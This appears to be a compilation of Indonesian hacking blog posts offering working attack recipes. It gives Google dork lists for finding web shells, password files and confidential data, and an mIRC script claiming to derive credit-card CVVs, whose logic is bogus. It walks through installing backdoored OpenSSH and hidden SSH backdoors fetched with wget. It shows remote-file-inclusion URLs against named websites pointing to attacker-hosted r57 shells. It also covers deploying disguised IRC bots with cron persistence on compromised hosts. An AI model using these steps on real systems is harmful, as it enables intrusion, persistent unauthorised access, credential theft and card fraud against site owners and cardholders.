php shell dgn my master

Cari php shell dengan google ternyata gampang banget… asal tau tulisan, atau kelimat yang ada pada web shell, maka kita akan tau.

seperti halnya dengan r57shell, yang biasanya bertitle r57shell dan di dalamnya terdapat banyak tulisan r57shell, yang letaknya pada bagian fooder ( bagian paling bawah bawah ).

untuk mencarinya dengan google dengan mengetikan perintah :

intext:r57shell+http-shell filetype:php

artinya kita akan mencari file yang didalam sebuah dokumen yang memiliki/ada tulisan r57shell yang tipe filenya adalah php.

kalau jadinya lihat aja disini php shell

Selamat berkreasi dechh…
pointnya asal tauu aja gimana penjelasannya dan ngerti  apa tujuannya… , kalau nggak ngertii ntar juga bakalan ngertiii….

google my MR

scripts cek pvv dari kartu kredit

Script Cek CVV Credit Card Lewat mIRC

script ini di buat untuk ngecek cvv dari kartu kredit.
perlu dicatat 90% hasilnya adalah benar… bukan pasti benar.

caranya, buka irc (ga perlu konek ke server). klik Alt+R
nah akan keluar box. pada tab remote tsb, masukkan script di bawah ini :

alias f5 cvv2
menu status,channel,query {
-
Cari CVV:cvv2
}
alias cekcvv2 {
set %cv1 $left(%cc,8)
set %cv1.1 $right(%cv1,1)
set %cv2 $left(%cc,12)
set %cv2.2 $right(%cv2,1)
set %cv3 $left(%cc,3)
set %cv3.3 $right(%cv3,1)
set %cv4 $left(%cc,1)
set %cv4.4 $calc(%cv3.3 + 1)
set %cvv2 %cv1.1 $+ %cv2.2 $+ %cv4.4
set %cvv $left(%cvv2,3)
.timer 2 2 /echo CVV dari %cc adalah %cvv Sikat!!!
.timer 1 5 /echo —– CVV2 Edited by Pippo #tuban on ALLNet —–

}
alias cvv2 dialog -m cvv2 cvv2
dialog cvv2 {
title “CVV Finder by p3p”
size -1 -1 250 145
box “Enjoy..!!”,2, 4 4 242 110
text “Masukan No CC Yang akan di cari CVV-nya”,4, 1 30 249 25, center
edit “”,5, 55 57 140 20 ,autohs
button “&Cari..!!!”,3, 80 85 100 20,defult,ok
text “Email : l3nk@walla.com “,7, 1 120 249 25, center,disable
}
on 1:dialog:cvv2:*:*: {
if ($devent == sclick) {
if ($did == 3) {
.set %cc $did(5)
.timer 1 1 cekcvv2
}
}
}

jika sudah, klik OK.
nah cara makenya, klik kanan di layar irc dan akan ada pilihan cari cvv pada bagian bawah. masukkan no kartu kreditnya, dan dapatilah hasilnya…

Sekian…

memasang backdoor menggunakan OpenSSH yang sudah di patch

Silakan di download di http://geocities.com/modeon_off/pippo/ssh.tgz

Proses installasi nya simple saja, lakukan di box yang hendak dipasang backdoor

[root@target]

1# wget http://geocities.com/modeon_off/pippo/ssh.tgz

2#tar zxvf ssh.tgz

3#cd openssh
Oke, sekarang sesuaikan versi openssh dengan openssh box target yang asli (ingat kita menggunakan OpenSSH 3.4p1). Edit file version.h


#define SSH_VERSION "OpenSSH_4.2"


Ubah password backdoor sesuai keinginan anda dengan melakukan pengeditan pada file includes.h


#define _SECRET_PASSWD "asdfg123"


Setelah semua beres, mulai lakukan installasi misal sebagai berikut : (Hanya SEMISAL SAJA, gunakan kreatifitas anda oke!!)


[root@target]#./configure --prefix=/usr/ --sysconfdir=/etc/ssh

[root@target]#make;make install

[root@target]#ps axu|grep /sbin/sshd

root 3380 0.0 0.6 4272 1576 ? Ss 13:15 0:00 /usr/sbin/sshd

root 4903 0.0 0.2 2032 664 pts/5 S+ 16:56 0:00 grep /sbin/sshd

[root@target]#/etc/init.d/sshd restart


Selesai installasi, sekarang coba anda login dari box anda ke box backdoor dengan

[root@aku]#ssh root@xxx.xxx.xxx.xxx (Ini adalah IP box backdoor)

password : <enter>

blablabla

[root@target]# akhir kata mg sukses :-ss

  

Tools berbahaya dari Google

Diam diam, site ini memberikan kita tools untuk melakukan hacking yang paling berbahaya se antero dunia, walaupun tools google ini hanya bisa memberikan sampai ke level footprinting ada juga yang bisa sampai ke level selanjutnya. kenapa aku sebut dengan tools ? karna kita menggunakan google untuk mencari media yang unsecure, yang mudah di hack yang bolong, yang belum ter update, karna google memiliki kekuatan untuk itu semua.

dari tutorial ini yang akan didapatkan adalah:

• Bagaimana cara menggunakan google untuk mencari sources dari personal information dan confidential data lainya
• Bagaimana cara mencari informasi tentang vulnerable systems and Web services
• Bagaimana cara mencari publicly available network devices.

Hal pertama dari yang harus di ketahui adalah Google Query Operators
Query operator ini berfungsi kasar sebagai filtering search nya google menjadi lebih spesifik berdasarkan query yang kita inginkan, masing masing query memiliki fungsi sendiri sendiri. berikut keterangan dan contong nya….

site
memfilter berdasarkan domain yang ada
contoh: site:google.com fox —> akan mencari kata fox di situs google.com

intitle
Memfilter dokumen yang memiliki title yang spesifik
contoh: intitle:fox fire —> akan mencari semua site yang ada kata fox dan didalamnya terdapat teks fire

allintitle
Memfilter dokumen untuk mencari intitle intile
contoh: allintitle:fox fire —> akan mencari semua site yang memiliki title fox dan yang memiliki title fire atau = intitle:fox intitle:fire

inurl
Memfilter pencarian dengan url yang spesifik
contoh: inurl:fox fire —> akan mencari kata fire di website yang url nya terdapat fox

allinurl
Sama dengan Allintitle (hanya ini url)

filetype, ext
Memfilter pencarian untuk dokumen yang spesifik
contoh: filetype:pdf fire —> akan mencari file PDF yang didalamnya terdapat kata fire

contoh keren: filetype:doc skripsi IT

numrange
Memfilter dokumen berdasarkan range tertentu
contoh: numrange:1-100 fire —> akan mencari range 1-100 yang terdapat kata fire

link
Memfilter site site yang memiliki link terhadap site tertentu
contoh: link:www.google.com —> akan mencari site site mana aja yang memiliki links ke google.com

inanchor
Memfilter berdasarkan site description yang ada
contoh: inanchor:fire —> akan mencari web yang memiliki deskripsi fire

kira kira itulah query query google yang keren keren, sisanya ada sih, seperti:
/ * – + “” ( ya ini regular ekspression biasa kan, jadi ngga perlu di jelaskan lebih detail )

nah, dari situ, kia bisa kreasikan ke berbagai macam jenis query untuk memfilter sesuatu, bahkan ke sesuatu yang lebih dalam, misalnya file database……

Web Server
untuk mencari target dengan mudah dilakukan google dengan menggunakan sintaks berikut ini:
“Apache/1.3.28 Server at” intitle:index.of
–> Apache 1.3.28

“Apache/2.0 Server at” intitle:index.of
–> Apache 2.0

“Apache/* Server at” intitle:index.of
–> semua versi dari Apache

“Microsoft-IIS/4.0 Server at” intitle:index.of
–> Microsoft Internet Information Services 4.0

“Microsoft-IIS/5.0 Server at” intitle:index.of
–> Microsoft Internet Information Services 5.0

“Microsoft-IIS/6.0 Server at” intitle:index.of
–> Microsoft Internet Information Services 6.0

“Microsoft-IIS/* Server at” intitle:index.of
–> semua versi dari Microsoft Internet Information Services

“Oracle HTTP Server/* Server at” intitle:index.of
–> semua versi dari Oracle HTTP Server

“IBM _ HTTP _ Server/* * Server at” intitle:index.of
–> semua versi dari IBM HTTP Server

“Netscape/* Server at” intitle:index.of
–> semua versi dari Netscape Server

“Red Hat Secure/*” intitle:index.of
–> semua versi dari the Red Hat Secure server

“HP Apache-based Web Server/*” intitle:index.of
–> semua versi dari the HP server

Beberapa Bug pada Skripts dapat ditemukan google:
“Generated by phpSystem”
–> dapat menemukan operating system type and version, hardware configuration, logged users, open connections, free memory dan disk space, mount points

“This summary was generated by wwwstat”
–> web server statistics, system file structure

“These statistics were produced by getstats”
–>web server statistics, system file structure

“This report was generated by WebLog”
–>web server statistics, system file structure

intext:”Tobias Oetiker” “traffic analysis”
–>system performance statistics as MRTG charts, network configuration

intitle:”Apache::Status” (inurl:server-status | inurl:status.html | inurl:apache.html)
–>server version, operating system type, child process list,current connections

intitle:”ASP Stats Generator *.*” “
–>ASP Stats

Generator” “2003-2004 weppos”
–>web server activity, lots of visitor information

intitle:”Multimon UPS status page”
–>UPS device performance statistics

intitle:”statistics of” “advanced web statistics”
–>web server statistics, visitor information

intitle:”System Statistics” +”System and Network Information Center”
–>system performance statistics as MRTG charts, hardware configuration, running services

intitle:”Usage Statistics for” “Generated by Webalizer”
–>web server statistics, visitor information, system file structure

intitle:”Web Server Statistics for ****”
–>web server statistics, visitor information

inurl:”/axs/ax-admin.pl” -script
–>web server statistics, visitor information

inurl:”/cricket/grapher.cgi”
–>MRTG charts of network interface performance

inurl:server-info “Apache Server Information”
–>web server version and configuration, operating system type, system file structure

“Output produced by SysWatch *”
–>operating system type and version, logged users, free memory and disk space, mount points, running processes,system logs

Error message queries
Salah satu kumpulan error message query, dapat ditemukan sehingga kita bisa mulai melakukan hacking pada tahap selanjutnya.

“A syntax error has occurred” filetype:ihtml
–>Informix database errors, berpotensial untuk mengambil function names, filenames, file structure information, pieces of SQL code and passwords

“Access denied for user” “Using password”
–>authorisation errors, berpotensial untuk mengambil user names, function names, file structure information and pieces of SQL code

“The script whose uid is ” “is not allowed to access”
–>access-related PHP errors, berpotensial untuk mengambil filenames, function names and file structure information

“ORA-00921: unexpected end of SQL command”
–>Oracle database errors, berpotensial untuk mengambil filenames, function names and file structure information

“error found handling the request” cocoon filetype:xml
–>Cocoon errors, berpotensial untuk mengambil Cocoon version information, filenames, function names and file structure information

“Invision Power Board Database Error”
–>Invision Power Board bulletin board errors, berpotensial untuk mengambil function names, filenames, file structure information and piece of SQL code

“Warning: mysql _ query()” “invalid query”
–>MySQL database errors, berpotensial untuk mengambil user names, function names, filenames and file structure information

“Error Message : Error loading required libraries.”
–>CGI script errors, berpotensial untuk mengambil information about operating system and program versions, user names, filenames and file structure information

“#mysql dump” filetype:sql
–>MySQL database errors, berpotensial untuk mengambil informasi database structure dan contents

Google queries untuk mencari lokasi passwords
kumpulan secara garis besar lokasi password sebuah sistem yang dapat diakses oleh google

“http://*:*@www”
site passwords for site, stored as the string

“http://username: password@www…” filetype:bak inurl:”htaccess|passwd|shadow|ht users”
file backups, berpotensial untuk mengambil user names and passwords

filetype:mdb inurl:”account|users|admin|administrators|passwd|password”
mdb files, berpotensial untuk mengambil password information

intitle:”Index of” pwd.db
pwd.db files, berpotensial untuk mengambil user names and encrypted passwords

inurl:admin inurl:backup intitle:index.of
directories whose names contain the words admin and backup

“Index of/” “Parent Directory” “WS _ FTP.ini” filetype:ini WS _ FTP PWD
WS_FTP configuration files, berpotensial untuk mengambil FTP server access passwords

ext:pwd inurl:(service|authors|administrators|users) “# -FrontPage-”
Terdapat Microsoft FrontPage passwords

filetype:sql (”passwd values ****” |”password values ****” | “pass values ****” )
Terdapat SQL code and passwords yang disimpan dalam a database

intitle:index.of trillian.ini
configuration files for the Trillian IM

eggdrop filetype:user
user configuration files for the Eggdrop ircbot

filetype:conf slapd.conf configuration files for OpenLDAP

inurl:”wvdial.conf” intext:”password” configuration files for WV Dial

ext:ini eudora.ini configuration files for the Eudora mail client

filetype:mdb inurl:users.mdb
Microsoft Access files, berpotensial untuk mengambil user account information

intext:”powered by Web Wiz Journal”
websites using Web Wiz Journal, which in its standard configuration allows access to the passwords file – just enter http:///journal/journal.mdb instead of the default http:///journal/

“Powered by DUclassified” -site:duware.com
“Powered by DUcalendar” -site:duware.com
“Powered by DUdirectory” -site:duware.com
“Powered by DUclassmate” -site:duware.com
“Powered by DUdownload” -site:duware.com
“Powered by DUpaypal” -site:duware.com
“Powered by DUforum” -site:duware.com
intitle:dupics inurl:(add.asp | default.asp |view.asp | voting.asp) -site:duware.com
websites yang menggunakan DUclassified, DUcalendar, DUdirectory, DUclassmate, DUdownload, DUpaypal, DUforum or DUpics applications, secara default memungkinkan kita untuk mengambil passwords file
– untuk DUclassified, just enter http:///duClassified/ _private/duclassified.mdb
atau http:///duClassified/

intext:”BiTBOARD v2.0″ “BiTSHiFTERS Bulletin Board”
website yang menggunakan Bitboard2 bulletin board, secara default settings memungkinkan kita untuk mengambil passwords file to be obtained
– dengan cara http:///forum/admin/data _ passwd.dat
atau http:///forum/forum.php

Mencari Dokumen khusus ?
filetype:xls inurl:”email.xls” email.xls
files, berpotensial untuk mengambil contact information

“phone * * *” “address *” “e-mail” intitle:”curriculum vitae”
CVs

“not for distribution”
confidential documents containing the confidential clause

buddylist.blt
AIM contacts list

intitle:index.of mystuff.xml
Trillian IM contacts list

filetype:ctt “msn”
MSN contacts list

filetype:QDF
QDF database files for the Quicken financial application

intitle:index.of finances.xls
finances.xls files, berpotensial untuk mengambil information on bank accounts, financial summaries and credit card numbers

intitle:”Index Of” -inurl:maillog maillog size maillog files, berpotensial untuk mengambil e-mail

“Network Vulnerability Assessment Report”
“Host Vulnerability Summary Report”
filetype:pdf “Assessment Report”
“This file was generated by Nessus”
reports for network security scans, penetration tests etc. On the Net

untuk lebih kreatifnya bisa di coba coba sendiri, okeh

reference:

• http://johnny.ihackstuff.com – largest repository of data on Google hacking,
• http://insecure.org/nmap/ – Nmap network scanner,
• http://thc.org/thc-amap/ – amap network scanner.

3gp maniax

Test drive, bagi para maniak maniak 3gp, apakah untuk hiburan di mobile phonenya ? atau buat nyimpen video jorok di mobilenya ? wekekeke, ya itu hak azazi masing masing mau di apain dengan 3gp nya, aku sendiri sih buat ehem ehem……wahahaha!

Coba tag ini dan search di google:

-inurl:htm -inurl:html -inurl:asp intitle:”index of” 3gp-inurl:htm -inurl:html -inurl:asp intitle:”index of” 3gp

Untuk pencaharian 3gp spesifik bisa search kesini:

filetype:3gp inurl:3gp

Jadi Misalkan mau cari 3gp yang ada hubunganya dengan “sexy” bisa begini:

filetype:3gp inurl:3gp sexy

trick bikin BACKDOOR SSH

ketik cd /tmp
wget http://www.geocities.com/banjarworo/ssh/term.tar.gz
tar -zxvf term.tar.gz
cd term
lalu ketik ./setup (password kamu) (portnya terserah kamu) Loginnya :
root Password (sesuai yg kmu buat tadi)
example : ./setup demit 2003 << jadi passwordku itu adalah
(demit) dg port (2003)
abis itu ketik rm -rf term.tar.gz
lalu ketik mv term ” ” << itu utk menyembunyikan file term
skrg buka putty lagi coba shell yg abis kmu bikinkan BACKDOOR tadi dg
akses SSH (sesuai dg port kmu tadi)

Catatan PENTING:
JUNJUNGLAH ETIKA HACKER!!!! Jangan merusak!!!
Jika kamu berhasil masuk (dan mendapatkan root). Jangan, sekali lagi
JANGAN jalankan perintah/program apapun yang kamu tidak tahu apa efeknya.
Pelajari bukumu, jalankan perintah-perintah sesuai petunjuk buku. JANGAN
coba-coba menjalankan eksploit tanpa tahu asal usul maupun pengertian
mendalam tentang UNIX. Tulisan ini saya tulis dengan maksud supaya kamu
bisa mendapatkan sarana untuk belajar UNIX sebab gue percaya bahwa
keinginan untuk belajar tidak sepantasnya dihalangi oleh faktor ekonomi.

Buat PsY&eggdroPS

cd namadirectory = Melihat Suatu directory

ls -al = Melihat Suatu Directory Lebih Dalam lagi

fined = Mengecek Directory directory

cat = Membaca Suatu Berkas

wget = MengUpload suatu Files

tar -zxvf = MengExtraxt suatu files yang berbentuk

tgz

pwd = Mengetahui Di Directory mana Kita Berada

uname -a = Keberadaan Path berada

w = Mengetahui Siapa Saja yang telah menggunakan Shell.

Cara buat psyBNC..,mungkin bagi para master uda bosen,, :d biarin cuek aje

Login ke shell.. . .. terus .. ..

-+- find / -type d -perm 777 <<– utk mencari direktory yang lobang

1. wget / lwp-download/ curl -o,/ fetch http://geocities.com/banjarworo/psy.tar.gz

2. tar -zxvf psy.tar.gz

3. cd psybnc

4. ./config port *port yg diinginkan*

5. ./fuck

6. ./run

seLesai Deh…

tinggaL buka Mirc /server target.com port pass Ident na terserah… yank pertama pake psy itu Langsung Admin…/addserver irc.indo.net.id:6667

/j #tuban ;p

“Pippo

biar rame chanel kuw wkekwke

————————–eggdrop———————————-

php injecktioN

ada bug nya gak ni eggdrop nya? hehe

pertama- tama login kesheL injecknya.. me biasa make script R57

http:/geocities.com/banjarworo/pippo.txt

mIsaL: http://www.timeframeinvestor.com/auth.cookie.inc.php?da_path=

<<< taarget nya

peyan tambahin ama script diatas

contoh:

http://www.timeframeinvestor.com/auth.coo

kie.inc.php?da_path=http:/geocities.com/banjarworo/pippo.txt?

dikasih ? inget :

langsung aja… dech ga bisa basa basi

1. Kamu cari folder mana yang bisa kamu masuki dengan cara

find / -type d -perm 777

Atau kalo nggak mau repot langsung aja kamu

wget di /var/tmp atau /tmp <<<–diketik di direktori

1. wget www.freewebs.com/bamby/bamby.tar.gz ato fetch http://geocities.com/banjarworo/pippo.tar.tgz

2. tar -zxvf bamby.tar.gz ato tar -zxvf pippo.tar.tgz
3. cd .dat
4. ./shanty conf nickbot ident ip-shell channel owner
contoh: ./shanty conf blu3-bot blu3 81.211.12.56 kompeni blu3

- conf –> config bot
- blu3-bot–> nick bot
- blu3 –> ident
- 81.211.12.56 –> ip shell
- kompeni –> channel (nggak pake #)
- blu3 <– nick owner

5. ./run conf [fake COMMAND]
contoh: ./run conf “/usr/local/apache/bin/httpd -DSSL”
6. cd scripts
7. ./autobotchk conf -1 -5
autobotchk untuk crontab
8. kalo temen temen pengen nambah tcl di dir /.dat/scripts;wget [tcl]

contoh : ./scripts; wget http://level9.up.md/seen.tcl

./scripts; wget http://geocities.com/banjarworo/lelap.txt
9. dir /.dat/; ./tcl -t conf nama.tcl

by:“pippo@allnet.org #tuban #banjarworo

buat botLouD iRC

Pertama tama u siapin shell injekan kamu.. kalo gak punya minta aja
sama master2 irc atau u beli sheLL kalo malu mintak

contoh:
http://thephotobucket.net/index.php?_config[site_path]= <<<– targetan Nya

http://geocities.com/banjarworo/loud.txt <<– scriptnya

kamu edit chanel ama adminya yang discript terus

simpen ke web kamu dengan nama .txt

dah gitu gabungin jadi satu target ama scriptnya

contoh :

http://thephotobucket.net/index.php?_config[site_path]=http://geoc

ities.com/web_kamu/loud.txt? jadi deh

kamu tunggu aja dichanel kamu .. chanel yang diedit tadi

kalo masih bingung contac me

di #tuban@allnetwork.or.id

nick “pippo

thanks yah

moga berhasiL